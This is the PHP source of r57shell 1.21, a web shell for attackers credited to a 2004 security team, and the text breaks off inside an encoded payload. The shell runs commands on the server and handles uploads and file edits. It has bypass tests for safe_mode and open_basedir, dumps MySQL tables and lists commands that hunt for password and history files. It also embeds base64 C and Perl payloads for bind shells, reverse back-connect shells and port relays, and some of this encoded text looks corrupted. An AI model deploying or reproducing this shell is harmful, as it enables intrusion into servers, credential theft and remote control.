Shell Rara

\___|_ /
/* -======\/==security=\/=team==\/
/*
/*
/*
/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ??
??????? ????? ???????
/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
/* ??????: 1.21
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~*/
/* ??? ??????? ? ????????? ?? ?????? ??????? ????????? ?? rst@void.ru
/* ????? ???????? ????? http://rst.void.ru/forum/ ???????? ??? ??? ???? ?????
?? ??? ??????.
/*
/* 2004 (c) rush security team
/*********************************************************************************
*********************/
/* ~~~ ????????? ~~~ */

error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = "1.21";
/* $http_post_vars --> $_post */

if(version_compare(phpversion(), '4.1.0') == -1)
{
$_post = &$http_post_vars;
$_get = &$http_get_vars;
$_server = &$http_server_vars;
}
// ??????????????
$head = '
';
/* show phpinfo */
if(isset($_get['phpinfo'])) { echo phpinfo(); echo "
[ back ]
"; die(); }
if(isset($_get['tmp']))
{
// delete tmp files
unlink("/tmp/bdpl");
unlink("/tmp/back");
unlink("/tmp/bd");
unlink("/tmp/bd.c");
unlink("/tmp/dp");
unlink("/tmp/dpc");
unlink("/tmp/dpc.c");
}
if(isset($_get['phpini']))
{
echo $head;
function u_value($value)
{
if ($value == '') return 'no value';
if (is_bool($value)) return $value ? 'true' : 'false';
if ($value === null) return 'null';
if (is_object($value)) $value = (array) $value;
if (is_array($value))
{
ob_start();
print_r($value);
$value = ob_get_contents();
ob_end_clean();
}
return u_wordwrap((string) $value);
}
function u_wordwrap($str)
{
$str = wordwrap(htmlspecialchars($str), 100, '', true);
return preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str);
}
if (function_exists('ini_get_all'))
{
$prefix .= '.';
$prefix_len = strlen($prefix);
echo '', '';
foreach (ini_get_all() as $key=>$value)
{
$r .= '';
}
echo $r;
echo '
directive
local value
master value
'.ws(3).''.$key.'
'.u_value($value['local_value']).'
'.u_value($value['global_value']).'
';
}
echo "
[ back ]
";
die();
}
/* magic_quotes */
if (get_magic_quotes_gpc())
{
foreach ($_post as $k=>$v)
{
$_post[$k]=stripslashes($v);
}
}
/*
????? ?????
$language='ru' - ???????
$language='eng' - ??????????
*/
$language='ru';
$lang=array(
'ru_text1' => '??????????? ???????',
'ru_text2' => '?????????? ?????? ?? ???????',
'ru_text3' => '????????? ???????',
'ru_text4' => '??????? ??????????',
'ru_text5' => '???????? ?????? ?? ??????',
'ru_text6' => '????????? ????',
'ru_text7' => '??????',
'ru_text8' => '???????? ?????',
'ru_butt1' => '?????????',
'ru_butt2' => '?????????',
'ru_text9' => '???????? ????? ? ???????? ??? ? /bin/bash',
'ru_text10' => '??????? ????',
'ru_text11' => '?????? ??? ???????',
'ru_butt3' => '???????',
'ru_text12' => 'back-connect',
'ru_text13' => 'ip-?????',
'ru_text14' => '????',
'ru_butt4' => '?????????',
'ru_text15' => '???????? ?????? ? ?????????? ???????',
'ru_text16' => '????????????',
'ru_text17' => '????????? ????',
'ru_text18' => '????????? ????',
'ru_text19' => 'exploits',
'ru_text20' => '????????????',
'ru_text21' => '????? ???',
'ru_text22' => 'datapipe',
'ru_text23' => '????????? ????',
'ru_text24' => '????????? ????',
'ru_text25' => '????????? ????',
'ru_text26' => '????????????',
'ru_butt5' => '?????????',
'ru_text28' => '?????? ? safe_mode',
'ru_text29' => '?????? ????????',
'ru_butt6' => '???????',
'ru_text30' => '???????? ?????',
'ru_butt7' => '???????',
'ru_text31' => '???? ?? ??????',
'ru_text32' => '?????????? php ????',
'ru_text33' => '???????? ??????????? ?????? ???????????
open_basedir ????? ??????? curl',
'ru_butt8' => '?????????',
'ru_text34' => '???????? ??????????? ?????? ??????????? safe_mode ?????
??????? include',
'ru_text35' => '???????? ??????????? ?????? ??????????? safe_mode ?????
???????? ????? ? mysql',
'ru_text36' => ' ????',
'ru_text37' => '?????',
'ru_text38' => '?????? ',
'ru_text39' => '???????',
'ru_text40' => '???? ??????? mysql ???????',
'ru_butt9' => '????',
'ru_text41' => '????????? ???? ? ?????',
'ru_text42' => '?????????????? ?????',
'ru_text43' => '????????????? ????',
'ru_butt10' => '?????????',
'ru_text44' => '?????????????? ????? ??????????! ?????? ?????? ???
??????!',
'ru_text45' => '???? ????????',
'ru_text46' => '???????? phpinfo()',
'ru_text47' => '???????? ???????? php.ini',
'ru_text48' => '???????? ????????? ??????',
/* --------------------------------------------------------------- */
'eng_text1' => 'executed command',
'eng_text2' => 'execute command on server',
'eng_text3' => ' run command',
'eng_text4' => 'work directory',
'eng_text5' => 'upload files on server',
'eng_text6' => 'local file',
'eng_text7' => 'aliases',
'eng_text8' => 'select alias',
'eng_butt1' => 'execute',
'eng_butt2' => 'upload',
'eng_text9' => 'bind port to /bin/bash',
'eng_text10' => 'port',
'eng_text11' => 'password for access',
'eng_butt3' => 'bind',
'eng_text12' => 'back-connect',
'eng_text13' => 'ip',
'eng_text14' => 'port',
'eng_butt4' => 'connect',
'eng_text15' => 'upload files from remote server',
'eng_text16' => ' with',
'eng_text17' => ' remote file',
'eng_text18' => ' local file',
'eng_text19' => 'exploits',
'eng_text20' => ' use',
'eng_text21' => ' new name',
'eng_text22' => 'datapipe',
'eng_text23' => 'local port',
'eng_text24' => 'remote host',
'eng_text25' => 'remote port',
'eng_text26' => 'use',
'eng_butt5' => 'run',
'eng_text28' => 'work in safe_mode',
'eng_text29' => 'access denied',
'eng_butt6' => 'change',
'eng_text30' => ' cat file',
'eng_butt7' => ' show ',
'eng_text31' => 'file not found',
'eng_text32' => 'eval php code',
'eng_text33' => 'test bypass open_basedir with curl functions',
'eng_butt8' => 'test',
'eng_text34' => 'test bypass safe_mode with include function',
'eng_text35' => 'test bypass safe_mode with load file in mysql',
'eng_text36' => 'database',
'eng_text37' => 'login',
'eng_text38' => 'password',
'eng_text39' => 'table',
'eng_text40' => 'dump table from mysql server',
'eng_butt9' => 'dump',
'eng_text41' => 'save dump in file',
'eng_text42' => 'edit files',
'eng_text43' => 'file for edit',
'eng_butt10' => 'save',
'eng_text44' => 'can\'t edit file! only read access!',
'eng_text45' => 'file saved',
'eng_text46' => 'show phpinfo()',
'eng_text47' => 'show variables from php.ini',
'eng_text48' => 'delete temp files',
);
/*
?????? ??????
????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ?????????
???? ????????? ???? )
?? ?????? ???? ????????? ??? ???????? ???????.
*/
$aliases=array(
/* ????? ?? ??????? ???? ?????? ? suid ????? */

'find all suid files' => 'find / -type f -perm -04000 -ls',
/* ????? ? ??????? ?????????? ???? ?????? ? suid ????? */

'find suid files in current dir' => 'find . -type f -perm -04000 -ls',
/* ????? ?? ??????? ???? ?????? ? sgid ????? */

'find all sgid files' => 'find / -type f -perm -02000 -ls',
/* ????? ? ??????? ?????????? ???? ?????? ? sgid ????? */

'find sgid files in current dir' => 'find . -type f -perm -02000 -ls',
/* ????? ?? ??????? ?????? config.inc.php */

'find config.inc.php files' => 'find / -type f -name config.inc.php',
/* ????? ?? ??????? ?????? config* */

'find config* files' => 'find / -type f -name "config*"',
/* ????? ? ??????? ?????????? ?????? config* */

'find config* files in current dir' => 'find . -type f -name "config*"',
/* ????? ?? ??????? ???? ?????????? ? ?????? ????????? ?? ?????? ??? ???? */

'find all writable directories and files' => 'find / -perm -2 -ls',
/* ????? ? ??????? ?????????? ???? ?????????? ? ?????? ????????? ?? ?????? ???

???? */
'find all writable directories and files in current dir' => 'find . -perm -2 -ls',
/* ????? ?? ??????? ?????? service.pwd ... frontpage =))) */

'find all service.pwd files' => 'find / -type f -name service.pwd',
/* ????? ? ??????? ?????????? ?????? service.pwd */

'find service.pwd files in current dir' => 'find . -type f -name service.pwd',
/* ????? ?? ??????? ?????? .htpasswd */

'find all .htpasswd files' => 'find / -type f -name .htpasswd',
/* ????? ? ??????? ?????????? ?????? .htpasswd */

'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd',
/* ????? ???? ?????? .bash_history */

'find all .bash_history files' => 'find / -type f -name .bash_history',
/* ????? ? ??????? ?????????? ?????? .bash_history */

'find .bash_history files in current dir' => 'find . -type f -name .bash_history',
/* ????? ???? ?????? .fetchmailrc */

'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc',
/* ????? ? ??????? ?????????? ?????? .fetchmailrc */

'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc',
/* ????? ?????? ????????? ?????? ?? ???????? ??????? ext2fs */

'list file attributes on a linux second extended file system' => 'lsattr -va',
/* ???????? ???????? ?????? */

'show opened ports' => 'netstat -an | grep -i listen',
'---------------------------------------------------------------------------------
-------------------' => 'ls -la'
);
/* html */
$table_up1 = "
:: "; $table_up2 = " ::
";
$table_up3 = "";
$arrow = " ?";
$lb = "[";
$rb = "]";
/* change dir */
if (!empty($_post['dir'])) { chdir($_post['dir']); }
$dir = getcwd();
/* get os */
$windows = 0;
$unix = 0;
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
if(empty($dir))
{ // ?? ?????? ???? ?? ??????? ???????? ??????????
$os = getenv('os');
if(empty($os)){ $os = php_uname(); } // ??????? ???????? ????? php_uname()
if(empty($os)){ $os ="-"; $unix=1; } // ???? ?????? ?? ?????????? ?? ????? unix
=)
else
{
if(eregi("^win",$os)) { $windows = 1; }
else { $unix = 1; }
}
}
/* ???????? ???? ????? ?? ?? ????????? ??????? ??? ??????????? safe_mode. ???? ???
?? ??????? ??? ???? ??????? */
/* ??????? ????????????? ?????????? ?????? ?? ????? ????? ???? ???????? ?? cmd.exe
???????????? */
/* ???? ????? ? php.ini ????????? disable_functions
*/
if($windows&&!$safe_mode)
{
exec("ver",$uname);
if(empty($uname)) { $safe_mode = 1; }
}
else if($unix&&!$safe_mode)
{
exec("uname",$uname);
if(empty($uname)) { $safe_mode = 1; }
}
/* get server info */

$server_software = getenv('server_software');
if(empty($server_software)){ $server_software = "-"; }
/* functions */
/* writespace */
/* tnx to virus for idea */
function ws($i)
{
return str_repeat(" ",$i);
}
/* write error */
function we($i)
{
if($globals['language']=="ru"){ $text = "??????! ?? ???? ???????? ? ???? "; }
else { $text = "[-] error! can't write in file "; }
echo "
"; $table_end1 = "
".$text.$i."
";
}
/* read error */
function re($i)
{
if($globals['language']=="ru"){ $text = "??????! ?? ???? ????????? ???? "; }
else { $text = "[-] error! can't read file "; }
echo "
".$text.$i."
";
}
/* permissions */
function perms($mode)
{
if ($globals['windows']) return 0;
if( $mode & 0x1000 ) $type='p';
else if( $mode & 0x2000 ) $type='c';
else if( $mode & 0x4000 ) $type='d';
else if( $mode & 0x6000 ) $type='b';
else if( $mode & 0x8000 ) $type='-';
else if( $mode & 0xa000 ) $type='l';
else if( $mode & 0xc000 ) $type='s';
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 's';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 's';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 't';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
/* find path to */
function which($pr)
{
if ($globals['windows']) { return 0; }
exec("which $pr",$path);
if(!empty($path)) return $path[0]; else return 0;
}
/* create file */
function cf($fname,$text)
{
$w_file=fopen($fname,"w") or we($fname);
if($w_file)
{
fputs($w_file,base64_decode($text));
fclose($w_file);
}
}
/*** base64
----------------------------------------------------------------------------------
------------------ */
/* --- port bind source c
----------------------------------------------------------------------------------
---- */
$port_bind_bd_c="i2luy2x1zgugphn0zglvlmg+dqojaw5jbhvkzsa8c3ryaw5nlmg+dqojaw5jbhvkz
sa8c3lzl3r5cgvzlmg+dqojaw5jbhvkzs
a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg0k
aw50ig1haw4oyxjnyyxhcmd2kq0kaw50i
gfyz2m7dqpjagfyicoqyxjndjsncnsgia0kigludcbzb2nrzmqsig5ld2zkow0kignoyxigynvmwzmwxts
ncibzdhj1y3qgc29ja2fkzhjfaw4gcmvt
b3rlow0kiglmkgzvcmsoksa9psawksb7ia0kihjlbw90zs5zaw5fzmftawx5id0gquzfsu5fvdsncibyzw
1vdguuc2lux3bvcnqgpsbodg9ucyhhdg9
pkgfyz3zbmv0pktsncibyzw1vdguuc2lux2fkzhiuc19hzgryid0gahrvbmwosu5brersx0fowsk7ia0ki
hnvy2tmzca9ihnvy2tldchbrl9jtkvulf
npq0tfu1rsrufnldapow0kiglmkcfzb2nrzmqpihblcnjvcigic29ja2v0igvycm9yiik7dqogymluzchz
b2nrzmqsichzdhj1y3qgc29ja2fkzhigk
ikmcmvtb3rllcawedewktsncibsaxn0zw4oc29ja2zklca1ktsncib3aglszsgxkq0kicb7dqogicbuzxd
mzd1hy2nlchqoc29ja2zkldasmck7dqog
icbkdxaykg5ld2zkldapow0kicagzhvwmihuzxdmzcwxktsnciagigr1cdiobmv3zmqsmik7dqogicb3cm
l0zshuzxdmzcwiugfzc3dvcmq6iiwxmck
7dqogicbyzwfkkg5ld2zklgj1zixzaxplb2yoynvmksk7dqogicbpziaoiwnocgfzcyhhcmd2wzjdlgj1z
ikpdqogicbzexn0zw0oimvjag8gd2vsy2
9tzsb0bybyntcgc2hlbgwgjiygl2jpbi9iyxnoic1piik7dqogicblbhnldqogicbmchjpbnrmkhn0zgvy
ciwiu29ycnkiktsnciagignsb3nlkg5ld
2zkktsnciagfq0kih0ncn0ncmludcbjahbhc3moy2hhciaqymfzzswgy2hhciaqzw50zxjlzckgew0kaw5
0igk7dqpmb3ioat0wo2k8c3rybgvukgvu
dgvyzwqpo2krkykgdqp7dqppzihlbnrlcmvkw2ldid09icdcbicpdqplbnrlcmvkw2ldid0gj1wwjzsgdq
ppzihlbnrlcmvkw2ldid09icdccicpdqp
lbnrlcmvkw2ldid0gj1wwjzsncn0ncmlmicghc3ryy21wkgjhc2uszw50zxjlzckpdqpyzxr1cm4gmdsnc
n0=";
/* --- end port bind source c
----------------------------------------------------------------------------------
*/
/* --- port bind source perl
----------------------------------------------------------------------------------
- */
$port_bind_bd_pl="iyevdxnyl2jpbi9wzxjsdqoku0hftew9ii9iaw4vymfzacatasi7dqppziaoqefs
r1ygpcaxksb7igv4axqomsk7ih0ncirms
vnuru5fue9svd0kqvjhvlswxtsncnvzzsbtb2nrzxq7dqokchjvdg9jb2w9z2v0chjvdg9iew5hbwuoj3r
jcccpow0kc29ja2v0kfmsjlbgx0lorvqs
jlnpq0tfu1rsrufnlcrwcm90b2nvbckgfhwgzgllicjdyw50ignyzwf0zsbzb2nrzxrcbii7dqpzzxrzb2
nrb3b0kfmsu09mx1npq0tfvcxtt19srvv
truferfismsk7dqpiaw5kkfmsc29ja2fkzhjfaw4ojexju1rftl9qt1juleloqureul9btlkpksb8fcbka
wugiknhbnqgb3blbibwb3j0xg4iow0kbg
lzdgvukfmsmykgfhwgzgllicjdyw50igxpc3rlbibwb3j0xg4iow0kd2hpbguomskncnsncmfjy2vwdchd
t05olfmpow0kawyoisgkcglkpwzvcmspk
q0kew0kzgllicjdyw5ub3qgzm9yayigawygkcfkzwzpbmvkicrwawqpow0kb3blbibtverjtiwipczdt05
oijsncm9wzw4gu1ret1vulci+jknptk4i
ow0kb3blbibtverfulisij4mq09otii7dqplegvjicrtsevmtcb8fcbkawugchjpbnqgq09otiaiq2fudc
blegvjdxrlicrtsevmtfxuijsncmnsb3n
lienptk47dqplegl0ida7dqp9dqp9";
/* --- end port bind source perl
------------------------------------------------------------------------------- */
/* --- back connect source perl
--------------------------------------------------------------------------------
*/
$back_connect="iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjgntzd0gimx5bngiow0kjhn5c3r
lbt0gj2vjag8gimb1bmftzsatywaio2vj
ag8gimbpzgaioy9iaw4vc2gnow0kjda9jgntzdsncir0yxjnzxq9jefsr1zbmf07dqokcg9ydd0kqvjhvl
sxxtsncirpywrkcj1pbmv0x2f0b24ojhr
hcmdldckgfhwgzgllkcjfcnjvcjogjcfcbiipow0kjhbhzgrypxnvy2thzgryx2lukcrwb3j0lcakawfkz
hipihx8igrpzsgirxjyb3i6icqhxg4ikt
sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0nl
x1nuukvbtswgjhbyb3rvksb8fcbkawuoi
kvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiik
7dqpvcgvukfnurelolcaipiztt0nlrvqi
ktsncm9wzw4ou1ret1vulcaipiztt0nlrvqiktsncm9wzw4ou1rervjslcaipiztt0nlrvqiktsncnn5c3
rlbsgkc3lzdgvtktsncmnsb3nlkfnurel
oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==";
/* --- end back connect source perl
---------------------------------------------------------------------------- */
/* --- back connect source c
----------------------------------------------------------------------------------
- */
$back_connect_c="i2luy2x1zgugphn0zglvlmg+dqojaw5jbhvkzsa8c3lzl3nvy2tldc5opg0ki2luy
2x1zgugpg5ldgluzxqvaw4uad4ncmludc
btywlukgludcbhcmdjlcbjagfyicphcmd2w10pdqp7dqogaw50igzkow0kihn0cnvjdcbzb2nrywrkcl9p
bibzaw47dqogy2hhcibybxnbmjfdpsjyb
satziaioyancibkywvtb24omswwktsncibzaw4uc2lux2zhbwlsesa9iefgx0lorvq7dqogc2lulnnpbl9
wb3j0id0gahrvbnmoyxrvashhcmd2wzjd
ksk7dqogc2lulnnpbl9hzgrylnnfywrkcia9igluzxrfywrkcihhcmd2wzfdktsgdqogynplcm8oyxjndl
sxxsxzdhjszw4oyxjndlsxxskrmstzdhj
szw4oyxjndlsyxskpoyancibmzca9ihnvy2tldchbrl9jtkvulcbtt0nlx1nuukvbtswgsvbquk9ut19uq
1apidsgdqogawygkchjb25uzwn0kgzklc
aoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kicag
cgvycm9ykcjblv0gy29ubmvjdcgpiik7d
qogicblegl0kdapow0kih0ncibzdhjjyxqocm1zlcbhcmd2wzbdktsncibzexn0zw0ocm1zktsgia0kigr
1cdiozmqsidapow0kigr1cdiozmqsidep
ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshmzc
k7ia0kfq==";
/* --- end back connect source c
------------------------------------------------------------------------------- */
/* --- datapipe.c
----------------------------------------------------------------------------------
------------ */
$datapipe_c="i2luy2x1zgugphn5cy90exblcy5opg0ki2luy2x1zgugphn5cy9zb2nrzxquad4ncinpb
mnsdwrlidxzexmvd2fpdc5opg0ki2luy2
x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxzdgrpby5opg0ki2luy2x1zgugphn0zgxpyi5opg0k
i2luy2x1zgugpgvycm5vlmg+dqojaw5jb
hvkzsa8dw5pc3rklmg+dqojaw5jbhvkzsa8bmv0zgiuad4ncinpbmnsdwrlidxsaw51ec90aw1llmg+dqo
jawzkzwygu1rsrvjst1incmv4dgvybibj
agfyicpzexnfzxjybglzdftdow0kzxh0zxjuigludcbzexnfbmvycjsncmnoyxigknvuzgvmid0gilvuzg
vmaw5lzcblcnjvcii7dqpjagfyicpzdhj
lcnjvcihlcnjvcikgia0kaw50igvycm9yoyagdqp7ia0kawygkgvycm9yid4gc3lzx25lcnipdqpyzxr1c
m4gdw5kzwy7dqpyzxr1cm4gc3lzx2vycm
xpc3rbzxjyb3jdow0kfq0ki2vuzglmdqoncm1haw4oyxjnyywgyxjndikgia0kicbpbnqgyxjnyzsgia0k
icbjagfyicoqyxjndjsgia0keyanciaga
w50igxzb2nrlcbjc29jaywgb3nvy2s7dqogiezjteugkmnmawxlow0kicbjagfyigj1zls0mdk2xtsncia
gc3rydwn0ihnvy2thzgryx2luigxhzgry
lcbjywrkciwgb2fkzhi7dqogigludcbjywrkcmxlbia9ihnpemvvzihjywrkcik7dqogigzkx3nldcbmzh
nylcbmzhnlow0kicbzdhj1y3qgag9zdgv
udcaqadsnciagc3rydwn0ihnlcnzlbnqgknm7dqogigludcbuynl0ow0kicb1bnnpz25lzcbsb25nige7d
qogihvuc2lnbmvkihnob3j0ig9wb3j0ow
0kdqogiglmichhcmdjice9idqpihsnciagicbmchjpbnrmkhn0zgvyciwivxnhz2u6icvzigxvy2fscg9y
dcbyzw1vdgvwb3j0ihjlbw90zwhvc3rcb
iisyxjndlswxsk7dqogicagcmv0dxjuidmwow0kicb9dqogigegpsbpbmv0x2fkzhioyxjndlszxsk7dqo
giglmicghkgggpsbnzxrob3n0ynluyw1l
kgfyz3zbm10pksamjg0kicagicagishoid0gz2v0ag9zdgj5ywrkcigmyswgncwgquzfsu5fvckpksb7dq
ogicagcgvycm9ykgfyz3zbm10pow0kica
gihjldhvybiayntsnciagfq0kicbvcg9ydca9igf0b2woyxjndlsyxsk7dqogigxhzgrylnnpbl9wb3j0i
d0gahrvbnmokhvuc2lnbmvkihnob3j0ks
hhdg9skgfyz3zbmv0pksk7dqogiglmicgobhnvy2sgpsbzb2nrzxqouezfsu5fvcwgu09ds19tvfjfqu0s
ielqufjpve9fvenqkskgpt0gltepihsnc
iagicbwzxjyb3ioinnvy2tldcipow0kicagihjldhvybiaymdsnciagfq0kicbsywrkci5zaw5fzmftawx
5id0gahrvbnmoquzfsu5fvck7dqogigxh
zgrylnnpbl9hzgrylnnfywrkcia9igh0b25skdapow0kicbpziaoymluzchsc29jaywgjmxhzgrylcbzax
plb2yobgfkzhipkskgew0kicagihblcnj
vcigiymluzcipow0kicagihjldhvybiaymdsnciagfq0kicbpziaobglzdgvukgxzb2nrlcaxkskgew0ki
cagihblcnjvcigibglzdgvuiik7dqogic
agcmv0dxjuidiwow0kicb9dqogiglmicgobmj5dca9igzvcmsokskgpt0gltepihsnciagicbwzxjyb3io
imzvcmsiktsnciagicbyzxr1cm4gmja7d
qogih0nciagawygkg5iexqgpiawkq0kicagihjldhvybiawow0kicbzzxrzawqoktsnciagd2hpbgugkch
jc29jaya9igfjy2vwdchsc29jaywgjmnh
zgrylcamy2fkzhjszw4pksahpsatmskgew0kicagignmawxlid0gzmrvcgvukgnzb2nrlcjykyipow0kic
agiglmicgobmj5dca9igzvcmsokskgpt0
gltepihsnciagicagigzwcmludgyoy2zpbgusici1mdagzm9yazogjxncbiisihn0cmvycm9ykgvycm5vk
sk7dqogicagicbzahv0zg93bihjc29jay
wyktsnciagicagigzjbg9zzshjzmlszsk7dqogicagicbjb250aw51ztsnciagicb9dqogicagawygkg5i
exqgpt0gmcknciagicagigdvdg8gz290c
29jazsnciagicbmy2xvc2uoy2zpbgupow0kicagihdoawxlich3ywl0cglkkc0xlcbovuxmlcbxtk9iqu5
hksa+idapow0kicb9dqogihjldhvybiay
mdsncg0kigdvdhnvy2s6dqogiglmicgob3nvy2sgpsbzb2nrzxqouezfsu5fvcwgu09ds19tvfjfqu0sie
lqufjpve9fvenqkskgpt0gltepihsncia
gicbmchjpbnrmkgnmawxllcaintawihnvy2tlddogjxncbiisihn0cmvycm9ykgvycm5vksk7dqogicagz
290bybxdwl0mtsnciagfq0kicbvywrkci
5zaw5fzmftawx5id0gac0+af9hzgrydhlwztsnciagb2fkzhiuc2lux3bvcnqgpsbodg9ucyhvcg9ydck7
dqogig1lbwnwesgmb2fkzhiuc2lux2fkz
hisiggtpmhfywrkciwgac0+af9szw5ndggpow0kicbpziaoy29ubmvjdchvc29jaywgjm9hzgrylcbzaxp
lb2yob2fkzhipkskgew0kicagigzwcmlu
dgyoy2zpbgusici1mdagy29ubmvjddogjxncbiisihn0cmvycm9ykgvycm5vksk7dqogicagz290bybxdw
l0mtsnciagfq0kicb3aglszsaomskgew0
kicagiezex1pfuk8ojmzkc3ipow0kicagiezex1pfuk8ojmzkc2upow0kicagiezex1nfvchjc29jaywmz
mrzcik7dqogicagrkrfu0vukgnzb2nrlc
zmzhnlktsnciagicbgrf9trvqob3nvy2ssjmzkc3ipow0kicagiezex1nfvchvc29jaywmzmrzzsk7dqog
icagawygkhnlbgvjdcgymcwgjmzkc3isi
e5vtewsiczmzhnllcbovuxmksa9psatmskgew0kicagicagznbyaw50zihjzmlszswgijuwmcbzzwxly3q
6icvzxg4ilcbzdhjlcnjvcihlcnjubykp
ow0kicagicagz290bybxdwl0mjsnciagicb9dqogicagawygkezex0ltu0vukgnzb2nrlczmzhnyksb8fc
bgrf9ju1nfvchjc29jaywmzmrzzskpihs
nciagicagiglmicgobmj5dca9ihjlywqoy3nvy2ssynvmldqwotypksa8psawkq0kcwdvdg8gcxvpddi7d
qogicagicbpziaokhdyaxrlkg9zb2nrlg
j1zixuynl0kskgpd0gmckncglnb3rvihf1axqyow0kicagih0gzwxzzsbpziaorkrfsvntrvqob3nvy2ss
jmzkc3ipihx8iezex0ltu0vukg9zb2nrl
czmzhnlkskgew0kicagicagawygkchuynl0id0gcmvhzchvc29jayxidwysnda5nikpidw9idapdqojz29
0bybxdwl0mjsnciagicagiglmicgod3jp
dguoy3nvy2ssynvmlg5iexqpksa8psawkq0kcwdvdg8gcxvpddi7dqogicagfq0kicb9dqoncibxdwl0mj
onciagc2h1dgrvd24ob3nvy2ssmik7dqo
gignsb3nlkg9zb2nrktsncibxdwl0mtonciagzmzsdxnokgnmawxlktsnciagc2h1dgrvd24oy3nvy2ssm
ik7dqogcxvpdda6dqogigzjbg9zzshjzm
lszsk7dqogihjldhvybiawow0kfq==";
/* --- end datapipe.c
----------------------------------------------------------------------------------
-------- */
/* --- datapipe.pl
----------------------------------------------------------------------------------
----------- */
$datapipe_pl="iyevdxnyl2jpbi9wzxjsdqp1c2ugsu86olnvy2tlddsncnvzzsbqt1njwdsncirsb2nh
bhbvcnqgpsakqvjhvlswxtsncirob3n0i
cagicagpsakqvjhvlsxxtsncirwb3j0icagicagpsakqvjhvlsyxtsncirkywvtb249mtsnciresvigpsb
1bmrlzjsncir8id0gmtsncmlmicgkzgfl
bw9ukxsgjhbpzca9igzvcms7igv4axqgawygjhbpzdsgzgllicikisigdw5szxnzigrlzmluzwqojhbpzc
k7ifbpu0lyojpzzxrzawqoksbvcibkawu
giiqhijsgfq0kjw8gpsaoj3bvcnqnid0+icrsb2nhbhbvcnqsj3rvcg9ydccgpt4gjhbvcnqsj3rvag9zd
ccgpt4gjghvc3qpow0kjgfoid0gsu86ol
nvy2tlddo6su5fvc0+bmv3kcdmb2nhbfbvcnqnid0+icrsb2nhbhbvcnqsj1jldxnljya9piaxlcdmaxn0
zw4nid0+idewksb8fcbkawugiiqhijsnc
irtsud7j0niteqnfsa9icdjr05pukunow0kjg51bsa9ida7dqp3aglszsaomskgeyancirjaca9icrhac0
+ywnjzxb0kck7iglmicghjgnoksb7ihby
aw50ifnurevsuiaijcfcbii7ig5lehq7ih0ncisrjg51btsncirwawqgpsbmb3jrkck7dqppziaoiwrlzm
luzwqojhbpzckpihsgchjpbnqgu1rervj
sicikivxuijsgfsancmvsc2lmicgkcglkid09idapihsgjgfolt5jbg9zzsgpoybsdw4oxcvvlcaky2gsi
crudw0poyb9ia0kzwxzzsb7icrjac0+y2
xvc2uoktsgfq0kfq0kc3viifj1bib7dqptesgkbywgjgnolcakbnvtksa9iebfow0kbxkgjhroid0gsu86
olnvy2tlddo6su5fvc0+bmv3kcdqzwvyq
wrkcicgpt4gjg8tpnsndg9ob3n0j30sj1blzxjqb3j0jya9piakby0+eyd0b3bvcnqnfsk7dqppziaoisr
0ackgeyblegl0ida7ih0ncm15icrmadsn
cmlmicgkby0+eydkaxinfskgeyakzmggpsbtew1ib2w6omdlbnn5bsgpoybvcgvukcrmacwgij4kby0+ey
dkaxinfs90dw5uzwwkbnvtlmxvzyipig9
yigrpzsaijceioyb9dqoky2gtpmf1dg9mbhvzacgpow0kjhrolt5hdxrvzmx1c2goktsncndoawxlicgky
2ggfhwgjhroksb7dqptesakcmluid0gii
i7dqp2zwmojhjpbiwgzmlszw5vkcrjacksidepid0gmsbpziaky2g7dqp2zwmojhjpbiwgzmlszw5vkcr0
acksidepid0gmsbpziakdgg7dqptesgkc
m91dcwgjgvvdxqpow0kc2vszwn0kcryb3v0id0gjhjpbiwgdw5kzwysicrlb3v0id0gjhjpbiwgmtiwkts
ncmlmicghjhjvdxqgicymicahjgvvdxqp
iht9dqptesaky2j1zmzlcia9iciiow0kbxkgjhridwzmzxigpsaiijsncmlmicgky2ggjiygkhzlyygkzw
91dcwgzmlszw5vkcrjacksidepihx8ihz
